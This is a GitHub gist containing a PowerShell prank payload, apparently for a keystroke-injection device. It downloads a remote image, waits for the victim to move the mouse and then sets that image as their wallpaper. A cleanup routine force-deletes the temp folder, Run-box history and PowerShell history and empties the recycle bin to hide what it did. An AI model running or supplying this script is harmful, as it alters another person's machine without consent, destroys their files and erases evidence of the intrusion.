Created
December 24, 2022 01:46
-
-
Save LudovicOmarini/9c4aaeefc788467ea8654bc482054b34 to your computer and use it in GitHub Desktop.
test
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # URL is for if you want to host your own copy of this payload | |
| $url = "https://s.topchretien.com/media/filer_public_thumbnails/filer_public/e1/79/e179cc79-d3b4-4004-9c21-bacb3677d7da/homme_laid-_humour.jpg__770x433_q85_crop_subsampling-2_upscale.jpg" | |
| $wp = "$Env:tmp\---wp.png" | |
| iwr $url -O $wp | |
| Function Set-WallPaper { | |
| param ( | |
| [parameter(Mandatory=$True)] | |
| # Provide path to image | |
| [string]$Image, | |
| # Provide wallpaper style that you would like applied | |
| [parameter(Mandatory=$False)] | |
| [ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')] | |
| [string]$Style | |
| ) | |
| $WallpaperStyle = Switch ($Style) { | |
| "Fill" {"10"} | |
| "Fit" {"6"} | |
| "Stretch" {"2"} | |
| "Tile" {"0"} | |
| "Center" {"0"} | |
| "Span" {"22"} | |
| } | |
| If($Style -eq "Tile") { | |
| New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force | |
| New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 1 -Force | |
| } | |
| Else { | |
| New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force | |
| New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 0 -Force | |
| } | |
| Add-Type -TypeDefinition @" | |
| using System; | |
| using System.Runtime.InteropServices; | |
| public class Params | |
| { | |
| [DllImport("User32.dll",CharSet=CharSet.Unicode)] | |
| public static extern int SystemParametersInfo (Int32 uAction, | |
| Int32 uParam, | |
| String lpvParam, | |
| Int32 fuWinIni); | |
| } | |
| "@ | |
| $SPI_SETDESKWALLPAPER = 0x0014 | |
| $UpdateIniFile = 0x01 | |
| $SendChangeEvent = 0x02 | |
| $fWinIni = $UpdateIniFile -bor $SendChangeEvent | |
| $ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni) | |
| } | |
| function Target-Comes { | |
| Add-Type -AssemblyName System.Windows.Forms | |
| $originalPOS = [System.Windows.Forms.Cursor]::Position.X | |
| $o=New-Object -ComObject WScript.Shell | |
| while (1) { | |
| $pauseTime = 3 | |
| if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){ | |
| break | |
| } | |
| else { | |
| $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime | |
| } | |
| } | |
| } | |
| function Clean-Exfil { | |
| # empty temp folder | |
| rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue | |
| # delete run box history | |
| reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f | |
| # Delete powershell history | |
| Remove-Item (Get-PSreadlineOption).HistorySavePath | |
| # Empty recycle bin | |
| Clear-RecycleBin -Force -ErrorAction SilentlyContinue | |
| } | |
| Target-Comes | |
| Set-WallPaper -Image $wp -Style Fill | |
| Clean-Exfil |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment